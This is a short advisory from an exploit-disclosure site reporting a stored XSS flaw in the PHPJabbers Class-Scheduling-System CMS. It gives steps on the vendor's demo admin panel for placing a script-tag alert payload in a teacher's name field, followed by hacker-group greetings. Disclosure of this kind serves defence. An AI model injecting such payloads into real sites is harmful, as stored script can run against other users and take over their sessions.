Class-Scheduling-System CMS - XSS Vulnerability

2017.12.28
Credit: 9aylas
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################## * Title : Class-Scheduling-System CMS - XSS Vulnerability * Author : 9aylas * Dork : N/A * Vendor : https://www.phpjabbers.com/class-scheduling-system/ ################################################################## Exploit : 1) Demo : #Admin panel : http://demo.phpjabbers.com/1514375108_185/index.php?controller=pjAdmin&action=pjActionIndex #Update teacher : ( Add or Edit ) as you like http://demo.phpjabbers.com/1514375108_185/index.php?controller=pjAdminTeachers&action=pjActionUpdate&id=5 Edit the Name Box to : test<script>alert('Xss3d')</script> Save and check it here : http://demo.phpjabbers.com/1514375108_185/index.php?controller=pjAdminTeachers&action=pjActionIndex&err=AT01 We see the Xss3d alert ^^ ~EOF ~~~~~~~~~~~~~~~~~~~~~~~~~Greet's to~~~~~~~~~~~~~~~~~~~~~~~~~~~~ / \ l Ghosty - AX302 - Redwan Red - Zahir - TheHappyBit - DebAAkrem l l Bellal - Hacker-Fire - Ramel - And all DzCyberSec ^_^ ... l l Welcom Back indouskha ;D l l~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~l https://cxsecurity.com/ - 27-12-2017


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top